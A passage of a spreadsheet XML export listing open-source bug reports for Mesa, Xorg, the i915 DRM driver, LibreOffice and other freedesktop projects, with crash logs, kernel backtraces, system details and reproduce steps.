 EE r600_shader.c:118 r600_pipe_shader_create - translation from TGSI failed !
 EE r600_state_common.c:564 r600_draw_vbo - missing vertex shader
 EE r600_shader.c:829 tgsi_unsupported - TXD tgsi opcode unsupported
 EE r600_shader.c:118 r600_pipe_shader_create - translation from TGSI failed !
 EE r600_state_common.c:564 r600_draw_vbo - missing vertex shader
I used apitrace to capture the game even though the trace ends in a segfault it's enough to reproduce the above errors.
http://dl.dropbox.com/u/28577999/dmc4.trace.7z (93M)
(To run the game in Wine native versions of WMASF.DLL and WMVCORE.DLL needs to be used)
System environment:
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- GPU: REDWOOD
-- Model: XFX Radeon HD 5670 1GB
-- Display connector: DVI
-- xf86-video-ati: 6.14.1
-- xserver: 1.10.1
-- mesa: git-fd6f2d6
-- drm: 2.4.25
-- kernel: 2.6.39</t>
  </si>
  <si>
    <t>REALMD-57064</t>
  </si>
  <si>
    <t>Lookup the nETBIOSName attribute correctly</t>
  </si>
  <si>
    <t>Lookup the netbios name for the domain correctly in CN=Partitions configuration naming context.
This is how we need to look up the name. From Marko:
This is in 2008 R2 domain. It turns out that nETBIOSName can be retrieved by using configurationNamingContext from rootDSE:
ldapsearch -H ldap://dc.example.com -Y GSSAPI -b '' -s base 'objectclass=*' configurationNamingContext
ldapsearch -H ldap://dc.example.com -Y GSSAPI -b 'CN=Partitions' '(&amp;(objectClass=crossRef)(dnsRoot=example.com)(nETBIOSName=*))' nETBIOSName</t>
  </si>
  <si>
    <t>XORG-89956</t>
  </si>
  <si>
    <t>Server crashes when drawing filled arcs that open up or down with xlib</t>
  </si>
  <si>
    <t>(this is just a copy of https://bugs.archlinux.org/task/43937 )
Description: I'm taking an online AI class where the first project was to modify a python pacman game. The game would crash the xserver whenever it tried to draw pacman facing up or down. Multiple Arch users reported this bug as well across multiple desktop environments and at least xf86-video-intel (HD4000) and xf86-videeo-nouveau (GeForce 6100). Python was using the Tk interface. This Tk script will cause the crash. (Run with wish . It will work as expected with -start 10 or -start 190 but will crash with -start 100 or -start 280. I was able to run an XCB program that drew arcs that open up and down as expected but I don't know if that means anything..
#!/usr/bin/wish
canvas .myCanvas -background red -width 100 -height 100
pack .myCanvas
.myCanvas create arc 10 10 80 80 -fill yellow -start 100 -extent 340
-----
Xorg crash log
-----
(EE) [mi] EQ overflow continuing. 1000 events have been dropped.
(EE) [mi] No further overflow reports will be reported until the clog is cleared.
(EE)
(EE) Backtrace:
(EE) 0: /usr/lib/xorg-server/Xorg (QueuePointerEvents+0x52) [0x450382]
(EE) 1: /usr/lib/xorg/modules/input/evdev_drv.so (_init+0x2ef7) [0x7f9b2be02977]
(EE) 2: /usr/lib/xorg/modules/input/evdev_drv.so (_init+0x363d) [0x7f9b2be03c3d]
(EE) 3: /usr/lib/xorg-server/Xorg (DPMSSupported+0xe8) [0x476c98]
(EE) 4: /usr/lib/xorg-server/Xorg (xf86SerialModemClearBits+0x277) [0x4a05a7]
(EE) 5: /usr/lib/libc.so.6 (__restore_rt+0x0) [0x7f9b33b6453f]
(EE) 6: /usr/lib/libpthread.so.0 (__pthread_once_slow+0xc2) [0x7f9b33921e82]
(EE) 7: /usr/lib/libc.so.6 (backtrace+0x9c) [0x7f9b33c2636c]
(EE) 8: /usr/lib/libc.so.6 (backtrace_and_maps+0x2e) [0x7f9b33b50b25]
(EE) 9: /usr/lib/libc.so.6 (__libc_message+0x2ce) [0x7f9b33ba298e]
(EE) 10: /usr/lib/libc.so.6 (malloc_printerr+0x9e) [0x7f9b33ba7dee]
(EE) 11: /usr/lib/libc.so.6 (_int_malloc+0x3af) [0x7f9b33ba964f]
(EE) 12: /usr/lib/libc.so.6 (__libc_malloc+0x6e) [0x7f9b33bab81e]
(EE) 13: /lib64/ld-linux-x86-64.so.2 (_dl_scope_free+0x8c) [0x7f9b35a4185c]
(EE) 13: /lib64/ld-linux-x86-64.so.2 (_dl_scope_free+0x8c) [0x7f9b35a4185c]
(EE) 14: /lib64/ld-linux-x86-64.so.2 (_dl_map_object_deps+0xc8f) [0x7f9b35a3c7ef]
(EE) 15: /lib64/ld-linux-x86-64.so.2 (dl_open_worker+0xff) [0x7f9b35a424cf]
(EE) 16: /lib64/ld-linux-x86-64.so.2 (_dl_catch_error+0x74) [0x7f9b35a3e0a4]
(EE) 17: /lib64/ld-linux-x86-64.so.2 (_dl_open+0xc3) [0x7f9b35a41e53]
(EE) 18: /usr/lib/libc.so.6 (do_dlopen+0x3d) [0x7f9b33c4e1fd]
(EE) 19: /lib64/ld-linux-x86-64.so.2 (_dl_catch_error+0x74) [0x7f9b35a3e0a4]
(EE) 20: /usr/lib/libc.so.6 (dlerror_run+0x2f) [0x7f9b33c4e28f]
(EE) 21: /usr/lib/libc.so.6 (__libc_dlopen_mode+0x31) [0x7f9b33c4e301]
(EE) 22: /usr/lib/libc.so.6 (init+0x15) [0x7f9b33c26255]
(EE) 23: /usr/lib/libpthread.so.0 (__pthread_once_slow+0x7b) [0x7f9b33921e3b]
(EE) 24: /usr/lib/libc.so.6 (backtrace+0x9c) [0x7f9b33c2636c]
(EE) 25: /usr/lib/libc.so.6 (backtrace_and_maps+0x2e) [0x7f9b33b50b25]
(EE) 26: /usr/lib/libc.so.6 (__libc_message+0x2ce) [0x7f9b33ba298e]
(EE) 27: /usr/lib/libc.so.6 (malloc_printerr+0x9e) [0x7f9b33ba7dee]
(EE) 28: /usr/lib/libc.so.6 (_int_free+0x12b) [0x7f9b33ba85cb]
(EE) 29: /usr/lib/xorg-server/Xorg (miPolyFillArc+0x320) [0x574dc0]
(EE) 30: /usr/lib/xorg/modules/drivers/intel_drv.so (_init+0x3a2f4) [0x7f9b2e77a374]
(EE) 31: /usr/lib/xorg-server/Xorg (DamageRegionAppend+0x1597) [0x51ba57]
(EE) 32: /usr/lib/xorg-server/Xorg (SendGraphicsExpose+0xd64) [0x436114]
(EE) 33: /usr/lib/xorg-server/Xorg (SendErrorToClient+0x2f7) [0x438a97]
(EE) 34: /usr/lib/xorg-server/Xorg (remove_fs_handlers+0x41b) [0x43cbcb]
(EE) 35: /usr/lib/libc.so.6 (__libc_start_main+0xf0) [0x7f9b33b51800]
(EE) 36: /usr/lib/xorg-server/Xorg (_start+0x29) [0x427039]
(EE) 37: ? (?+0x29) [0x29]
(EE)</t>
  </si>
  <si>
    <t>bohmer</t>
  </si>
  <si>
    <t>UDISKS-24054</t>
  </si>
  <si>
    <t>Devickit-disks doesn't support changing ntfs label</t>
  </si>
  <si>
    <t>Adding that support is trivial:
maxim@maxim-laptop:~$ ntfslabel 
Usage: ntfslabel [options] device [label]
    -n --no-action    Do not write to disk
    -f --force        Use less caution
    -q --quiet        Less output
    -v --verbose      More output
    -V --version      Display version information
    -h --help         Display this help
Developers' email address: linux-ntfs-dev@lists.sf.net
Linux NTFS homepage: http://www.linux-ntfs.org</t>
  </si>
  <si>
    <t>DRI-100975</t>
  </si>
  <si>
    <t>i915_dmc_info missing IS_KABYLAKE check</t>
  </si>
  <si>
    <t>Adding the Kabylake new DMC firmware i915_dmc_info doesn't expose DC3 -&gt; DC5 and DC5 -&gt; DC6 counts.</t>
  </si>
  <si>
    <t>nathan.d.ciobanu</t>
  </si>
  <si>
    <t>DRI-99159</t>
  </si>
  <si>
    <t>Screen flickering when resolution max 2560 1440 on razer blade stealth</t>
  </si>
  <si>
    <t>Created attachment 128585
full dmesg
Hello
I've just installed a fresh debian stretch on my razer blade stealth QHD and
the screen is flickering black when the resolution is maximum (2560x1440).
The problem occurs even downgrading the refresh rate to 40Hz and on console
weston XFCE awesome WM.
I tried to reproduce the problem with the nightly version of the drm i915 but
failed to compile and installed it.
Thanks
More information:
uname -r : 4.8.0-2-amd64
uname -m : x86_64
linux dist: debian stretch
machine: razer blade stealth (http://www.razerzone.com/gaming-systems/razer-blade-stealth)
GPU: HD 620 integrated to intel i7 7500U kaby lake
display connector: eDP1</t>
  </si>
  <si>
    <t>MESA-92738</t>
  </si>
  <si>
    <t>Randon R7 240 doesn't work on 16KiB page size platform</t>
  </si>
  <si>
    <t>The radeon gpu that with VM supported doesn't work on &gt;= 4KiB page size platforms. (e.g. Loongson 16k)
It seems we assume that the maximum page size is 4096 in radeon_bomgr_find_va and radeon_bomgr_free_va. I think dynmamic get system page size here would better.</t>
  </si>
  <si>
    <t>r</t>
  </si>
  <si>
    <t>XORG-19403</t>
  </si>
  <si>
    <t>[945GM FBC] xf86-video-intel git freezes the screen on Macbook</t>
  </si>
  <si>
    <t>Created attachment 21687
xorg.conf
after some random time screen seems to freeze. with xf86-video-intel and xorg-server-1.5.3. the screen freezes just in an middel horizontal area. like 16:9. there is a small band at the upper and down side where movement and changes could be seen.
it seems that setting:
Option          FramebufferCompression   false
solved this issue for me.
uname -m: x86_64
machine is macbook rev. 2.
reproduce:
dpms has to be activated. after some random time screen just freezes.</t>
  </si>
  <si>
    <t>zsolt</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-8047</t>
  </si>
  <si>
    <t>support alt-caps to toggle groups</t>
  </si>
  <si>
    <t>Hi
a Debian user requested at http://bugs.debian.org/362850 a new option to
let alt-caps toggle groups.  A patch can be found at this URL.
It looks fine by me Sergey please tell me if you will consider it I will
then incorporate it now.</t>
  </si>
  <si>
    <t>LIBREOFFICE-63033</t>
  </si>
  <si>
    <t>Update Dutch dictionary to OpenTaal2.10</t>
  </si>
  <si>
    <t>Problem description:  The dutch dicanary is on version 2.0 from Opentaal.org but there is a update to 2.10 that has 6700 chances  so I can be handy to update. 
Current behavior: version 2.0
better: version 2.10 
I hope this will in the next release 
download link: http://www.opentaal.org/bestanden/doc_download/18-woordenlijst-v-210g-bronbestanden- 
Operating System: All
Version: unspecified</t>
  </si>
  <si>
    <t>DRI-84162</t>
  </si>
  <si>
    <t>[PNV/BDW Bisected]igt/kms_flip/bo-too-big causes WARNING: CPU: 0 PID: 23592 at drivers/gpu/drm/drm_irq.c:1089 drm_wait_one_vblank+0x140/0x16b [drm]()</t>
  </si>
  <si>
    <t xml:space="preserve">==System Environment==
--------------------------
Regression: Yes.
Non-working platforms: BDW
==kernel==
--------------------------
origin/drm-intel-nightly:c5660b4ad395f1e34eacc22cf81c687edfc9c83c(fails)
    drm-intel-nightly: 2014y-09m-19d-18h-12m-22s UTC integration manifest
==Bug detailed description==
-----------------------------
igt/kms_flip/bo-too-big causes WARNING: CPU: 0 PID: 23592 at drivers/gpu/drm/drm_irq.c:1089 drm_wait_one_vblank+0x140/0x16b [drm]()
Dmesg:
[ 800.191509] WARNING: CPU: 0 PID: 23592 at drivers/gpu/drm/drm_irq.c:1089 drm_wait_one_vblank+0x140/0x16b [drm]()
[ 800.331935] vblank wait timed out on crtc 1
[ 800.399579] Modules linked in: ip6table_filter ip6_tables iptable_filter ip_tables ebtable_nat ebtables ipv6 x_tables dm_mod iTCO_wdt iTCO_vendor_support ppdev snd_hda_codec_hdmi snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep pcspkr lpc_ich snd_pcm snd_timer i2c_i801 mfd_core snd soundcore battery parport_pc parport ac acpi_cpufreq i915 button video drm_kms_helper drm
[ 801.215019] CPU: 0 PID: 23592 Comm: kms_flip Not tainted 3.17.0-rc5_prts_ab7f1a_20140917_debug+ #28
[ 801.341792] 0000000000000000 ffff8800a59cba08 ffffffff8181608c ffff8800a59cba50
[ 801.499527] ffff8800a59cba40 ffffffff8103e87f ffffffffa000611a 0000000000000001
[ 801.623572] ffff880149f83000 ffff88014999e500 0000000000000001 ffff8800a59cbaa0
[ 801.798185] Call Trace:
[ 801.844769] [] dump_stack+0x45/0x56
[ 801.924017] [] warn_slowpath_common+0x7f/0x98
[ 802.013826] [] ? drm_wait_one_vblank+0x140/0x16b [drm]
[ 802.113102] [] warn_slowpath_fmt+0x4c/0x4e
[ 802.199736] [] ? finish_wait+0x5c/0x65
[ 802.282182] [] drm_wait_one_vblank+0x140/0x16b [drm]
[ 802.379324] [] ? abort_exclusive_wait+0x89/0x89
[ 802.471260] [] intel_enable_primary_hw_plane+0x7a/0x83 [i915]
[ 802.577936] [] intel_crtc_enable_planes+0x2f/0xd7 [i915]
[ 802.679338] [] haswell_crtc_enable+0x876/0x89d [i915]
[ 802.777576] [] __intel_set_mode+0xc77/0x127f [i915]
[ 802.873708] [] intel_set_mode+0x14/0x2a [i915]
[ 802.964555] [] intel_crtc_set_config+0x9b6/0xa9f [i915]
[ 803.064888] [] drm_mode_set_config_internal+0x55/0xe0 [drm]
[ 803.169474] [] drm_mode_setcrtc+0x39e/0x498 [drm]
[ 803.263508] [] drm_ioctl+0x385/0x404 [drm]
[ 803.350123] [] ? drm_mode_setplane+0x1d8/0x1d8 [drm]
[ 803.447289] [] do_vfs_ioctl+0x3a3/0x46c
[ 803.530752] [] ? current_kernel_time+0x61/0x9a
[ 803.621606] [] ? trace_hardirqs_on_caller+0x16e/0x18a
[ 803.719836] [] SyS_ioctl+0x50/0x7d
[ 803.798028] [] system_call_fastpath+0x16/0x1b
[ 803.887828] ---[ end trace cf73ea7c0a54ece6 ]---
[ 805.364639] ------------[ cut here ]------------
[ 805.436565] WARNING: CPU: 0 PID: 23592 at drivers/gpu/drm/drm_irq.c:1089 drm_wait_one_vblank+0x140/0x16b [drm]()
[ 805.576987] vblank wait timed out on crtc 2
[ 805.644631] Modules linked in: ip6table_filter ip6_tables iptable_filter ip_tables ebtable_nat ebtables ipv6 x_tables dm_mod iTCO_wdt iTCO_vendor_support ppdev snd_hda_codec_hdmi snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep pcspkr lpc_ich snd_pcm snd_timer i2c_i801 mfd_core snd soundcore battery parport_pc parport ac acpi_cpufreq i915 button video drm_kms_helper drm
[ 806.493896] CPU: 0 PID: 23592 Comm: kms_flip Tainted: G W 3.17.0-rc5_prts_ab7f1a_20140917_debug+ #28
[ 806.634340] 0000000000000000 ffff8800a59cba08 ffffffff8181608c ffff8800a59cba50
[ 806.808959] ffff8800a59cba40 ffffffff8103e87f ffffffffa000611a 0000000000000002
[ 806.949849] ffff880149f83000 ffff88014999e600 0000000000000001 ffff8800a59cbaa0
[ 807.107663] Call Trace:
[ 807.154207] [] dump_stack+0x45/0x56
[ 807.233458] [] warn_slowpath_common+0x7f/0x98
[ 807.323266] [] ? drm_wait_one_vblank+0x140/0x16b [drm]
[ 807.422548] [] warn_slowpath_fmt+0x4c/0x4e
[ 807.509181] [] ? finish_wait+0x5c/0x65
[ 807.591603] [] drm_wait_one_vblank+0x140/0x16b [drm]
[ 807.688778] [] ? abort_exclusive_wait+0x89/0x89
[ 807.780717] [] intel_enable_primary_hw_plane+0x7a/0x83 [i915]
[ 807.887390] [] intel_crtc_enable_planes+0x2f/0xd7 [i915]
[ 807.988791] [] haswell_crtc_enable+0x876/0x89d [i915]
[ 808.087031] [] __intel_set_mode+0xc77/0x127f [i915]
[ 808.183163] [] intel_set_mode+0x14/0x2a [i915]
[ 808.274004] [] intel_crtc_set_config+0x9b6/0xa9f [i915]
[ 808.374348] [] drm_mode_set_config_internal+0x55/0xe0 [drm]
[ 808.478914] [] drm_mode_setcrtc+0x39e/0x498 [drm]
[ 808.572927] [] drm_ioctl+0x385/0x404 [drm]
[ 808.659562] [] ? drm_mode_setplane+0x1d8/0x1d8 [drm]
[ 808.756735] [] do_vfs_ioctl+0x3a3/0x46c
[ 808.840202] [] ? current_kernel_time+0x61/0x9a
[ 808.931053] [] ? trace_hardirqs_on_caller+0x16e/0x18a
[ 809.029291] [] SyS_ioctl+0x50/0x7d
[ 809.107613] [] system_call_fastpath+0x16/0x1b
[ 809.197281] ---[ end trace cf73ea7c0a54ece7 ]--- 
==Reproduce steps==
---------------------------- 
1. ./kms_flip --run-subtest bo-too-big
==Bisect results form [PRTS][auto-bisect]==
----------------------------
commit 7682654dacbf60887b6d090f1228a80e14caddbc
Author:     Daniel Vetter 
AuthorDate: Mon Sep 15 12:36:02 2014 +0200
Commit:     Daniel Vetter 
CommitDate: Tue Sep 16 10:22:08 2014 +0200
    drm/i915: Use generic vblank wait
    This has the upside that it will no longer steal interrupts from the
    interrupt handler on pre-g4x. Furthermore this will now scream properly
    on all platforms if we don't have hw counters enabled.
    v2: Adjust to the new names.
    Cc: Ville SyrjÃƒÂ¤lÃƒÂ¤ 
    Reviewed-by: Matt Roper 
    Signed-off-by: Daniel Vetter </t>
  </si>
  <si>
    <t>XORG-17356</t>
  </si>
  <si>
    <t>NV4B 10DE:0393 Startx fails using nouveau on third console to Xorg context switch</t>
  </si>
  <si>
    <t>Ubuntu 8.04.1
(/var/log/Xorg.0.log) Xserver 1.4.0.90
(dpkg -l | grep nouveau) xserver-xorg-video-nouveau 1:0.0.10~git20080827-0~ppa1~hardy
(/var/log/messages) nouveau 0.0.11 drm-2.3.0-1870-g9c7137483d1ef47ea
(dpkg -l | grep drm) libdrm2 2.3.1+git20080827-0~ppa1~hardy
(/var/log/messages) drm drm-2.3.0-1870-g9c7137483d1ef47ea
(uname -a) kernel 2.6.24-19-generic #1 SMP Wed Aug 20 22:56:21 UTC 2008 i686 GNU/Linux
Using ROAFs packaged nouveau - thanks ROAF!
Boot machine (context switch console to x) login via gdm on account1 logout (context switch x to console) gdm restarts (context switch console to x) login via gdm on account2 logout (context switch x to console) gdm attempts to restart using nouveau but fails Xorg eventually resorts to using the vesa driver in lieu of nouveau and manages to start.
Will attach xorg log from sucessful start log does not appear to be retained on failed startup attempt - any suggestions on how to grab this appreciated.</t>
  </si>
  <si>
    <t>mark.carey</t>
  </si>
  <si>
    <t>DRI-99938</t>
  </si>
  <si>
    <t>[BAT][GVT-d] timeout waiting for SBI to complete read transaction</t>
  </si>
  <si>
    <t>Seems to be a known bug since there is already a patch for it (https://patchwork.freedesktop.org/series/20193/).
However we do not want to report failures to other developers so let's show that it is a known problem.</t>
  </si>
  <si>
    <t>LIBREOFFICE-34548</t>
  </si>
  <si>
    <t>EDITING: CRASH in action after Undo</t>
  </si>
  <si>
    <t>To reproduce this error do the following steps:
1. Open Impress
2. Create a new Empty presentation with the Presentation Wizard
3. Add some text on the title slide in the Text Frame (where it says Click to add text)
4. deselect the Text Frame 
5. select the Text Frame and delete it
6. Undo as much as possible 
	BUG1(The text will not reappear)
7. Click in the Text Frame so that you get a cursor to enter text
8. Click somewhere beside the Text Frame and LibreOffice will crash
	BUG2(CRASH)
Because the second bug is likely caused by the first we filed just a single bug report.
We were able to reproduce this with 3.3.0 on both Win7_64 and Ubuntu 10.10 x64 and 3.3.1 RC2 on Win7_64.</t>
  </si>
  <si>
    <t>canscabh</t>
  </si>
  <si>
    <t>DRI-75001</t>
  </si>
  <si>
    <t>[945gm] ACPI Brightness adjustment is broken in 945GM with kernel 3.14-rc2</t>
  </si>
  <si>
    <t>Created attachment 94098
dmesg output 3.14-rc2 with drm.debug
First reported in the Linux kernel mailing list.
Laptop Model: Asus EeePC 1000H
Graphics: Intel 945GM
Testing the kernel version 3.14-rc2 I noticed adjusting the screen brightness didn't work. The problem is already present in 3.14-rc1 whereas the 3.13 branch works fine.
I first bisected the issue down to the following commit:
bc0bb9fd1c7810407ab810d204bbaecb255fddde drm/i915: remove QUIRK_NO_PCH_PWM_ENABLE
However given the concern that the bisection might be bogus I replayed it up to the last 6 bisect steps. The issue was present in this bisect session and this time I tracked it down to the commit:
b35684b8fa94e04f55fd38bf672b737741d2f9e2 drm/i915: do full backlight setup at enable time
Hopefully this makes more sense.
Per request of the developers I've tested changing the brightness manually through the sysfs. Here are the results.
ls -l /sys/class/backlight:
lrwxrwxrwx 1 root root 0 Feb 14 21:00 eeepc -&gt; ../../devices/platform/eeepc/backlight/eeepc
lrwxrwxrwx 1 root root 0 Feb 14 20:59 intel_backlight -&gt; ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-LVDS-1/intel_backlight
Linux 3.13.3: change the brightness manually:
Changing /sys/class/backlight/eeepc/brightness changes brightness and updates the value.
changing /sys/class/backlight/intel_backlight/brightness changes brightness but does NOT update the value. Always reports 156.
Linux 3.14-rc2: change the brightness manually:
changing /sys/class/backlight/eeepc/brightness does NOT change brightness but updates the value.
changing /sys/class/backlight/intel_backlight/brightness changes brightness and updates the value.
Finally I attach the following files:
dmesg.log</t>
  </si>
  <si>
    <t>luiorpe1</t>
  </si>
  <si>
    <t>XORG-20548</t>
  </si>
  <si>
    <t>[855GM] Corruption in VGA font glyphs when switching back to console</t>
  </si>
  <si>
    <t>Created attachment 23662
xorg.0.log
If I start X with driver version 2.6.1-1 from Debian experimental and then switch back to the VGA console the font glyphs are sometimes corrupted.  One time the space had two pixels turned on another time the lowercase 'd' had a little cluster of pixels wrongly turned black.  This doesn't seem to be permanent switching around consoles exiting and restarting X and so on will eventually lead to correct glyphs again.
I'll attach my config and log.</t>
  </si>
  <si>
    <t>XORG-14373</t>
  </si>
  <si>
    <t>xkb: Alternative layouts don't work due to groups invented by the server</t>
  </si>
  <si>
    <t>The following configuration doesn't work with xorg-1.4.0.90:
Section InputDevice
    Identifier  Keyboard
    Driver      kbd
    Option      AutoRepeat    250 30
    Option XkbModel pc105
    Option XkbLayout dede(nodeadkeys)
    Option XkbOptions grp:caps_toggle
EndSection
Symptons:
When you press the a key you get an a when switched to one group but an Ã¦ when switched to the other group. Most other keys are broken too. The reason is that for all keys where the 2 layouts have identical mappings and which therefore should contain only 1 group (xkbcomp optimizes away identical groups) the server invents a 2nd group that contains the last 2 symbols from group1.
Example: Here is the symbol mapping of the a key as reported by xkbcomp :0 - after starting the server with the above configuration.
key  {
 type[group1]= FOUR_LEVEL_ALPHABETIC
  symbols[Group1]= [  a  A  ae AE ]
  symbols[Group2]= [  ae AE ]
 }
And here is how it should be
key  {
  type= FOUR_LEVEL_ALPHABETIC
  symbols[Group1]= [  a   A  ae   AE ]
 }
And this is indeed what you get when you issue the command 
setxkbmap -layout dede(nodeadkeys)
after the server has started. Why is this different? The 2 should be the same shouldn't they?
Unfortunately due to bug #14359 putting the setxkbmap command into .xinitrc can not be used as a workaround.</t>
  </si>
  <si>
    <t>haferfrost</t>
  </si>
  <si>
    <t>DRI-79573</t>
  </si>
  <si>
    <t>[ILK/BDW]igt/gem_evict_everything subcases minor-interruptible and minor-normal fail</t>
  </si>
  <si>
    <t>Created attachment 100339
dmesg
==System Environment==
--------------------------
Regression: No. 
These cases always fail
Non-working platforms: ILK BDW
==kernel==
--------------------------
origin/drm-intel-nightly: 455a8fc4304af51a913e33763b72dd2849c11d0c(fails)
    drm-intel-nightly: 2014y-06m-02d-19h-49m-25s integration manifest
origin/drm-intel-next-queued: 866997c6fc0d3ed9fa35770d23ba2f48c17919c7(fails)
    drm/i915: Drop unused lut tables from intel_plane
origin/drm-intel-fixes: d23db88c3ab233daed18709e3a24d6c95344117f(fails)
    drm/i915: Prevent negative relocation deltas from wrapping
==Bug detailed description==
-----------------------------
igt/gem_evict_everything subcases minor-interruptible and minor-normal fail
Output:
./gem_evict_everything --run-subtest minor-interruptible
IGT-Version: 1.6-g532b7e6 (x86_64) (Linux: 3.15.0-rc3_drm-intel-next-queued_866997_20140603+ x86_64)
Test assertion failure function copy file gem_evict_everything.c:125:
Last errno: 0 Success
Failed assertion: ret == error
Subtest minor-interruptible: FAIL
==Reproduce steps==
---------------------------- 
1. ./gem_evict_everything --run-subtest minor-interruptible</t>
  </si>
  <si>
    <t>LIBREOFFICE-30800</t>
  </si>
  <si>
    <t>UI: grid lines disappeared in Calc for cells with background color</t>
  </si>
  <si>
    <t>LibreOffice Calc
LibreOffice 3.3.0 
OOO330m7 (Build:9526)
libreoffice-build 3.2.99.0
All the grid lines disappeared for cells with background colour set to anything other than No Fill</t>
  </si>
  <si>
    <t>cunio</t>
  </si>
  <si>
    <t>BUSTLE-93904</t>
  </si>
  <si>
    <t>Some leaks in parse_arguments()</t>
  </si>
  <si>
    <t>Created attachment 121353
bustle-pcap: stop leaking so much in parse_arguments()
Heresy!</t>
  </si>
  <si>
    <t>DRI-42585</t>
  </si>
  <si>
    <t>[PNV]testdisplay can't show all modes with -t</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform:        pineview
Kernel:         (master)c3b92c8787367a8bb53d57d9789b558f1295cc96
Bug detailed description:
-------------------------
   when we do testdisplay -t with 2 displays(VGALVDS)the VGA monitor can't show all modes it shows on the screen like :
set tiling failed: Invalid argument
allocation failed 1280x1024
set tiling failed: Invalid argument
allocation failed 1280x1024
set tiling failed: Invalid argument
allocation failed 1152x864
.</t>
  </si>
  <si>
    <t>XORG-14936</t>
  </si>
  <si>
    <t>intel-batchbuffer branch asks for libpciaccess 0.10.0 instead of 0.10</t>
  </si>
  <si>
    <t>Created attachment 15002
corrects the problem
This makes the autogen.sh fail with current libpciaccess 0.10.</t>
  </si>
  <si>
    <t>DRI-109482</t>
  </si>
  <si>
    <t>[CI][DRMTIP] igt@gem_eio@ - dmesg-fail / incomplete - GEM_BUG_ON(!i915_request_completed(request))</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_200/fi-hsw-peppy/igt@gem_eio@reset-stress.html
 [246.910194] i915_request_retire:255 GEM_BUG_ON(!i915_request_completed(request))
 [246.910477] ------------[ cut here ]------------
 [246.910481] kernel BUG at drivers/gpu/drm/i915/i915_request.c:255!
 [246.910524] invalid opcode: 0000 [#1] PREEMPT SMP PTI
 [246.910538] CPU: 1 PID: 954 Comm: kworker/u4:21 Tainted: G     U            5.0.0-rc3-g08f37be937e0-drmtip_200+ #1
 [246.910556] Hardware name: GOOGLE Peppy/Peppy BIOS MrChromebox 02/04/2018
 [246.910632] Workqueue: i915 restart_work [i915]
 [246.910711] RIP: 0010:i915_request_retire+0x690/0x930 [i915]
 [246.910724] Code: ef 85 ed eb 48 8b 35 27 ca 1c 00 49 c7 c0 d8 d6 37 c0 b9 ff 00 00 00 48 c7 c2 00 6b 34 c0 48 c7 c7 4b 07 25 c0 e8 40 1a f4 eb  0b 49 8b 57 28 49 8b 47 30 48 89 42 08 48 89 10 e9 4c ff ff ff
 [246.910754] RSP: 0018:ffffb314808e7d50 EFLAGS: 00010282
 [246.910766] RAX: 000000000000000f RBX: ffff8b0ce33944c0 RCX: 0000000000000000
 [246.910780] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff8b0cf46b8008
 [246.910793] RBP: ffffb314808e7d80 R08: 000000000011bc32 R09: ffff8b0cf460b000
 [246.910807] R10: 0000000000000000 R11: ffff8b0cf46b8008 R12: ffff8b0cd5e78f38
 [246.910820] R13: ffff8b0ce3396d40 R14: ffff8b0ce3394dc0 R15: ffff8b0cd5e78f50
 [246.910834] FS:  0000000000000000(0000) GS:ffff8b0d80100000(0000) knlGS:0000000000000000
 [246.910850] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [246.910862] CR2: 00007ffe09f7b598 CR3: 0000000068aca005 CR4: 00000000000606e0
 [246.910875] Call Trace:
 [246.910888]  ? rcu_read_lock_sched_held+0x6f/0x80
 [246.910968]  i915_request_retire_upto+0xfd/0x150 [i915]
 [246.911045]  i915_request_add+0x3b0/0x7f0 [i915]
 [246.911109]  restart_work+0x7b/0xb0 [i915]
 [246.911125]  process_one_work+0x245/0x610
 [246.911140]  worker_thread+0x37/0x380
 [246.911152]  ? process_one_work+0x610/0x610
 [246.911164]  kthread+0x119/0x130
 [246.911175]  ? kthread_park+0x80/0x80
 [246.911189]  ret_from_fork+0x3a/0x50
 [246.911202] Modules linked in: vgem snd_hda_codec_hdmi x86_pkg_temp_thermal coretemp crct10dif_pclmul crc32_pclmul ghash_clmulni_intel cdc_ether usbnet r8152 mii i2c_i801 lpc_ich i915 snd_hda_codec_realtek snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm mei_me mei prime_numbers btusb btrtl btbcm btintel bluetooth ecdh_generic</t>
  </si>
  <si>
    <t>MESA-18734</t>
  </si>
  <si>
    <t>Radeon XPRESS 200M (RC410) - xorg crash when enabling compiz (regression)</t>
  </si>
  <si>
    <t>Linux 2.6.26.6-49.fc8 Fedora 8
All code checked out as of 2008/11/26 17:00 GMT -5
Compile went OK and non-compositing environment (WindowMaker) appears to work OK. But starting compiz causes a server crash and leaves the screen in graphics mode. 
This is the same system as bug #17723 but it is NOT a duplicate of it. Previous build of xserver git tree worked Ok with 64 MB ram. Current build crashes on same conditions.
Output of lspci -v:
00:00.0 Host bridge: ATI Technologies Inc Radeon Xpress 200 Host Bridge (rev
01)
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 64
        Memory at  (64-bit non-prefetchable)
00:01.0 PCI bridge: ATI Technologies Inc RS480 PCI Bridge (prog-if 00 [Normal
decode])
        Flags: bus master 66MHz medium devsel latency 99
        Bus: primary=00 secondary=01 subordinate=01 sec-latency=68
        I/O behind bridge: 0000e000-0000efff
        Memory behind bridge: fde00000-fdefffff
        Prefetchable memory behind bridge: d8000000-dfffffff
        Capabilities: 
00:11.0 IDE interface: ATI Technologies Inc 437A Serial ATA Controller (rev 80)
(prog-if 8f [Master SecP SecO PriP PriO])
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 64 IRQ 23
        I/O ports at ff00 [size=8]
        I/O ports at fe00 [size=4]
        I/O ports at fd00 [size=8]
        I/O ports at fc00 [size=4]
        I/O ports at fb00 [size=16]
        Memory at fe02f000 (32-bit non-prefetchable) [size=512]
        [virtual] Expansion ROM at 40000000 [disabled] [size=512K]
        Capabilities: 
        Kernel driver in use: sata_sil
        Kernel modules: sata_sil
00:12.0 IDE interface: ATI Technologies Inc 4379 Serial ATA Controller (rev 80)
(prog-if 8f [Master SecP SecO PriP PriO])
        Subsystem: Intel Corporation Unknown device d600
